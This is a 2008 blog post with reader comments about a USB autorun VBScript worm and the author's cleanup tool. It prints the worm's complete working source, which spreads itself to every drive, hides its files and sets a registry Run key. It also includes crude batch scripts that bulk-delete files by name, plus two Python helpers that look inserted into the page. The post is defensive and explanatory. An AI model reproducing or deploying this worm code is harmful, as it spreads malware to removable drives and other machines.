Posted by: Anurag Ojha | April 19, 2008

Restore access to drives under My Computer

Does this happen to you?

  • You cannot access or enter the hard drives on your computer when you click on a partition, say the C or the D drive?
  • You find an annoying autorun.inf or MSwin32.dll.vbs or r.cmd or bqk.bat or klp8j6i.com on all your flash drives and partitions?
  • Task Manager disabled? Can't view hidden files?
  • Startup is slow? PC hangs while booting up?


The Solution

  1. Download and run this file: Unlock.v1.2, from HERE or HERE (updated July 08, 2008)
  2. Save all your work and restart your computer

Note: The Script Killer file might take a few minutes to run and might display error messages. That is normal. The file will not do any harm. Whether it helped or not, please drop in a comment. Thanks!

Read further only if you would like to read more about the problem and how I solved it! Also read my article on Removing the FlashDrive autorun.inf Virus for more info

A few words of explanation about the (so called) virus

The contents of a typical malicious autorun.inf

[autorun]
shellexecute=wscript.exe mswin32.dll.vbs

The contents of the file MSwin32.dll.vbs

‘ i like to be known as (udaipu) v1.02
‘ i made this virus because s3 umbi poi. it sucked.. so give me marks…..xxxrxextxxx

on error resume next
dim autoc,winpath,flashdrive,fs,mf,auto,tf,rg,nt,check,sd

auto = “[autorun]”&vbcrlf&”shellexecute=wscript.exe mswin32.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
autoc=autoc&text.readline
autoc=autoc & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MSwin32.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\mswin32.dll.vbs”,2,true)
tf.write autoc
tf.close
set tf = fs.getfile(winpath & “\mswin32.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\mswin32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MSwin32.dll.vbs”,2,true)
tf.write autoc
tf.close
set tf=fs.getfile(flashdrive.path &”\mswin32.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write auto
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”We want avinash sir back.”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run\MSwin32″,winpath&”\mswin32.dll.vbs”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

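For any person with a basic understanding of scripts, it will be quite clear what this script is all about 😛 and which settings on your computer are being changed: it copies itself into the Windows folder and onto every removable and fixed drive except A:, drops the autorun.inf shown above next to each copy, marks the files read-only, hidden and system (attributes = 39), adds a Run entry named MSwin32 under HKEY_LOCAL_MACHINE so it starts with Windows, and overwrites the Internet Explorer window title.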
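To triage an autorun.inf like the one above without opening the drive in Explorer, the following added example (not part of the Unlock tool or the original post) parses the file and flags launch directives that start a script host or a script-type file. The key list, extension list and the two constructed samples are assumptions made for illustration; only PAGE_SAMPLE and the file name k36fevhw.cmd come from this page.

```python
import ntpath

# [autorun] keys that make Windows start a program from the drive.
LAUNCH_KEYS = ("open", "shellexecute")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe"}
RISKY_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".com", ".scr", ".pif"}

# The autorun.inf quoted in the post.
PAGE_SAMPLE = "[autorun]\nshellexecute=wscript.exe mswin32.dll.vbs\n"
# Constructed: a variant with junk lines, built around the file name a commenter reports.
VARIANT_SAMPLE = "[AutoRun]\n;x\nzzzz junk\nOpen=k36fevhw.cmd\nshell\\open\\Command=k36fevhw.cmd\n"
# Constructed: a typical installer disc.
BENIGN_SAMPLE = "[autorun]\nicon=setup.ico\nlabel=Install Disc\nopen=setup.exe\n"

def launch_commands(text):
    """Return {key: command} for each launch directive in the [autorun] section."""
    found, in_autorun = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:  # lines without '=' are padding, skip them
            key, value = (part.strip() for part in line.split("=", 1))
            key = key.lower()
            if key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
                found[key] = value
    return found

def assess(text):
    """Return (key, command, reason) for every directive worth a closer look."""
    findings = []
    for key, cmd in launch_commands(text).items():
        names = [ntpath.basename(tok).lower() for tok in cmd.replace('"', " ").split()]
        if names and names[0] in SCRIPT_HOSTS:
            findings.append((key, cmd, "starts script host " + names[0]))
        elif any(ntpath.splitext(name)[1] in RISKY_EXTS for name in names):
            findings.append((key, cmd, "launches a script or legacy executable type"))
    return findings

if __name__ == "__main__":
    for label, sample in (("page", PAGE_SAMPLE), ("variant", VARIANT_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, assess(sample) or "no risky launch directive")
```
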

What is wscript.exe ?

It is the Windows Scripting Host!

How did I do it?

Now this is the fun part 😀

The following operations are performed by the file:

  1. Terminates the Windows Processes wscript.exe and monit.exe.
  2. Deletes all autorun.inf files on system.
  3. Deletes all mswin32.dll.vbs files on system.
  4. Deletes all r.cmd files on system.
  5. Deletes all bqk.bat files on system.
  6. Deletes all klp8j6i.com files on system.
  7. Deletes the virus entry from startup/registry.
  8. Disables Scripting.

The file actually extracts these separate files in C:\

UNLOCK.BAT

@echo off
taskkill /IM wscript.exe
taskkill /IM monit.exe

dir/b/s/l/a-d c:\autorun.inf> out.bat
dir/b/s/l/a-d d:\autorun.inf>> out.bat
dir/b/s/l/a-d e:\autorun.inf>> out.bat
dir/b/s/l/a-d f:\autorun.inf>> out.bat
dir/b/s/l/a-d g:\autorun.inf>> out.bat
dir/b/s/l/a-d h:\autorun.inf>> out.bat
dir/b/s/l/a-d i:\autorun.inf>> out.bat
dir/b/s/l/a-d j:\autorun.inf>> out.bat
dir/b/s/l/a-d k:\autorun.inf>> out.bat
dir/b/s/l/a-d l:\autorun.inf>> out.bat
dir/b/s/l/a-d m:\autorun.inf>> out.bat
dir/b/s/l/a-d n:\autorun.inf>> out.bat
dir/b/s/l/a-d c:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d d:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d e:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d f:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d g:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d h:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d i:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d j:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d k:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d l:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d m:\mswin32.dll.vbs>> out.bat
dir/b/s/l/a-d n:\mswin32.dll.vbs>> out.bat

ECHO Deleting Virus files …
edlin out.bat <c:\attall.bat>nul
call out.bat
edlin out.bat <c:\delall.bat>nul
call out.bat

ECHO Deleting registry entries …
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSwin32 /f
REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v monit /f
REG IMPORT restorie.reg

ECHO Deleting temporary files …
del restorie.reg
del out.bat
rename out.bak out.bat
del out.bat
del attall.bat
del delall.bat
del unlock.bat

ATTALL.BAT

1,#rc:\*attrib -r -s -h "c:\
1,#rd:\*attrib -r -s -h "d:\
1,#re:\*attrib -r -s -h "e:\
1,#rf:\*attrib -r -s -h "f:\
1,#rg:\*attrib -r -s -h "g:\
1,#rh:\*attrib -r -s -h "h:\
1,#ri:\*attrib -r -s -h "i:\
1,#rj:\*attrib -r -s -h "j:\
1,#rk:\*attrib -r -s -h "k:\
1,#rl:\*attrib -r -s -h "l:\
1,#rm:\*attrib -r -s -h "m:\
1,#rn:\*attrib -r -s -h "n:\
1,#rautorun.inf*autorun.inf"
1,#rmswin32.dll.vbs*mswin32.dll.vbs"
e

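Replace each * with the Ctrl+Z character, which edlin uses to separate the search text from the replacement text, by pressing CTRL+P+Z in the edit window.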

DELALL.BAT

1,#rattrib -r -s -h "c:\*DEL "c:\
1,#rattrib -r -s -h "d:\*DEL "d:\
1,#rattrib -r -s -h "e:\*DEL "e:\
1,#rattrib -r -s -h "f:\*DEL "f:\
1,#rattrib -r -s -h "g:\*DEL "g:\
1,#rattrib -r -s -h "h:\*DEL "h:\
1,#rattrib -r -s -h "i:\*DEL "i:\
1,#rattrib -r -s -h "j:\*DEL "j:\
1,#rattrib -r -s -h "k:\*DEL "k:\
1,#rattrib -r -s -h "l:\*DEL "l:\
1,#rattrib -r -s -h "m:\*DEL "m:\
1,#rattrib -r -s -h "n:\*DEL "n:\
e

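Replace each * with the Ctrl+Z character, which edlin uses to separate the search text from the replacement text, by pressing CTRL+P+Z in the edit window.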

RESTORIE.REG

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"=-

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Microsoft Internet Explorer"

NOSCRIPT.EXE /silent

Disables scripting

After the operation is complete all the temporary files are deleted.
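UNLOCK.BAT hard-codes drives c: to n: and deletes every match by name, which also removes any legitimate autorun.inf kept in a copied installer folder. As an added example (not part of the Unlock tool), the sweep below covers whatever roots it is given and moves matches into a quarantine folder with a manifest instead of deleting them; the function names, the quarantine layout and the manifest format are assumptions made for illustration.

```python
import json
import os
import shutil
import stat
import string

# File names the post lists as symptoms of this infection.
IOC_NAMES = {"autorun.inf", "mswin32.dll.vbs", "r.cmd", "bqk.bat", "klp8j6i.com"}

def drive_roots():
    """Every mounted drive letter from C: upward, instead of a fixed c: to n:."""
    return [f"{d}:\\" for d in string.ascii_uppercase[2:] if os.path.exists(f"{d}:\\")]

def find_ioc_files(roots, names=IOC_NAMES):
    """Walk each root and return files (never folders) whose name matches."""
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
            hits += [os.path.join(dirpath, f) for f in files if f.lower() in names]
    return sorted(hits)

def quarantine(paths, dest):
    """Move hits into dest under neutral names; return {stored path: original path}."""
    os.makedirs(dest, exist_ok=True)
    manifest = {}
    for n, path in enumerate(paths):
        try:
            os.chmod(path, stat.S_IREAD | stat.S_IWRITE)  # clear the read-only bit
            stored = os.path.join(dest, f"{n:04d}.quarantined")
            shutil.move(path, stored)
            manifest[stored] = path
        except OSError:
            continue  # locked or already gone: leave it for the next pass
    with open(os.path.join(dest, "manifest.json"), "w") as fh:
        json.dump(manifest, fh, indent=2)
    return manifest

if __name__ == "__main__":
    for hit in find_ioc_files(drive_roots()):  # report only; quarantine is a separate step
        print(hit)
```

Review the printed list before calling quarantine(), and keep the quarantine folder outside the scanned roots.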

Download Noscript.exe to permanently disable scripts, read more on how to manually disable (or re-enable) the Windows Scripting Host at Symantec, or read what Sophos has to say about it.

Okay, the programming above is crude but hey, it works 😉

I want to reverse engineer this script to use its rapid spreading power against it. To make it cure the infection of all the systems it infects. Maybe in due time …

My congratulations to the guys who made this virus/vbscript 😛 It has gotten into almost every system in my college.

Comments and suggestions welcome and I hope it helps!

Responses

  1. Thanks much … it worked well and now i know more of what to look for.

  2. Overpopulation says : I absolutely agree with this !

  3. u r simply gr8.!!!!!!!!!!

  4. Pls Help It doesn't work for me !!!!
    Please i have to remove it today.
    I have Tried urr unlock.v.1 but no effect on my drives

  5. Dear Hamza, ill more details about your problem! Unlock 1.1 works for only a particular strain of virus. Maybe the version you're infected with is different, read my other post on this blog and try to follow the methods listed there.

  6. Hi guys,

    Download the new Unlock v.1.2 from here http://mihd.net/pvukj6e !

    It should take care of autorun.inf or MSwin32.dll.vbs or r.cmd or bqk.bat or klp8j6i.com etc

  7. gr8, superb, wonderful!!!!!!!!!
    hats off 2 u……..
    🙂

  8. You asked for feedback. I tried your Unlock 1.2 fix but it made no difference… still no access to drives.

  9. Did you immediately restart your computer after running the patch?

    Try running the patch again by:
    0) Save all your work.
    1) [ctrl]+[alt]+[del] Task Manager
    2) Explorer.exe/Right Click/End Process Tree *WARNING* This will kill all your applications, and you will only see the task manager and the wallpaper in background.
    3) File/New Task/ Locate Unlock v.1.2.exe
    4) Wait for execution. After it gives a successful completion message, restart computer – Shut Down/Restart

  10. Is the person who made it a malayali engineering student? from kerala in india? avg detects it. and removes it without much problem.

  11. I dont know. These are the words of the virus author: “s3 umbi poi”

    Sounds south indian to me. “Poi” mean go home in Malayalam.

  12. […] >> Restore access to drives under My Computer Some of the symptoms of an infected […]

  13. Is this something I should do if I can’t open up “My Computer” or “My Documents” or anything like that? I can’t even open up my recycle bin, and when I try to open any of the above my screen flashes and all of my icons disappear for a second and then everything goes back to normal… I am not so smart with computers so I have no idea what the problem is.

  14. When your screen flashes what happens is that your session of windows crashes. This is because the system detected that something went wrong which it could not handle, so the user interface kinda closes and reloads.

    What you could do is install a good updated antivirus like ESET NOD32 and Spyware Doctor.

    Otherwise you will have to manually find and delete the virus. But since you are a novice i would recommend that you run this tool that i made http://mihd.net/pvukj6e It might solve your problem, though it was built for a different virus.

  15. Hi…
    I really thank you for sharing your tool for killing the viruses. but then, it doesn’t work for me. also, i have tried the steps on your other post but i still can’t remove the virus.
    when i typed type autorun.inf in the DOS mode, i saw that it opens a file named k36fevhw.cmd.
    please help me on this.. thank you…

  16. ” ‘ i like to be known as (udaipu) v1.02
    ‘ i made this virus because s3 umbi poi. it sucked.. so give me marks…..xxxrxextxxx ”

    Udaipu is a malayalam slang for “person playing tricks on others” and umbi poi is a slang for “sucked”.So clearly it is created by a malayali engnrng student who failed to score in s3 xams.Interesting !

  17. it is working man

    thanks

  18. hey pls help me too can i know the steps to remove this “We want avinash sir back” virus

  19. Hi Binu,

    Open Regedit
    – Start Menu/Run/ Type “regedit” [Enter]
    Browse down to Internet Explorer Setting page
    – HKEY_CURRENT_USER / Software / Microsoft / Internet Explorer
    Now find “Main” under Internet Explorer and after you click on it, find “Window Title” in the right side.
    Right click on “Window Title” which current must be having setting “We want avinash sir back” and change it to “Microsoft Internet Explorer”

    ALTERNATE(quicker)

    1. Open Regedit
    2. Press [CTRL]+F , Type “avinash” and Regedit will straightway take you to the key.
    3. Right Click/Modify the key!

  20. Thanks a ton !! but after changing the status in the reg to internet explorer it still shows the same line” we want avi….” do we have to save the new status and if so how .. pl advice….

  21. You will have to delete the Virus files first.
    Read the full post, and install the necessary softwares.
    Do a full system scan.
    Then try to manually change the registry.

  22. Dear Sir

    You tube and orkut are not running in my laptop

    I have downloaded mozilla also but while open mozilla one msg is coming that i hate mozilla try IE.

    Pl help

  23. Hi riya my pendrive have write protection so i can’t delete any file in pendrive it show “disk is write protected”There is no switch in my pendrive
    please help

  24. Hi,

    My system is hanging while start up. Sometimes it is not hanging. But when i click any drive, say d:/ or e:/, then it get hanged.

    Also i am not able to see the hidden files.

    As per your suggestion, i downloaded “Unlock.v1.2.exe” and executed. I got a messages the following messages..

    1. error: the process “wscript.exe not found
    .
    .
    .
    then “error file not found…”

    then “invalid file name”..

    then “disabling script”..

    then “deleting temporary files”

    then restart your computer

    then press any key to continue…

    Immediately i restarted, again my system is hanging and still i am not able to see the hidden files.

    PLEASE HELP ME………………..

  25. hi… i got an autorun.inf on my 3 drives it has a subfolder, its name is immunity folder.. and a note that says “this file
    is a virus it should be deleted by itself”

    I can access all my drives there is no problem accessing it. My problem is that i have a psp and a sony ericsson phone, I want
    to put new games on my psp but my computer won’t let me copy paste anything from my pc to my devices. It prompts that my
    memory card is locked but it isn’t. i asked a favor to my office mate if he can change the games on my psp, and he did, so it’s
    not my memory card it’s my computer that has a problem.

    i followed your instructions and run unlock.v.1.2 only the notepad has been deleted. i also tried ending explorer in task
    and run unlock.v.1.2 and restart my computer but still the folder autorun.inf isn’t deleted and i can’t still copy paste anything
    from my pc to my device.

    pls. help me….
    thank you!

  26. Are The Program Worked?
    I Had Tried It But My Kaspersky Antivirus Was Blocked It!
    And My Computer Can’t Create DirectSound Already!
    It Will Say “Create DirectSound Error”
    Please Help Me…

  27. Hey, my computer does not even start, i can’t even make it safe mode… when that screen is there it blocks, so how can i install your program 😦
    thanks!

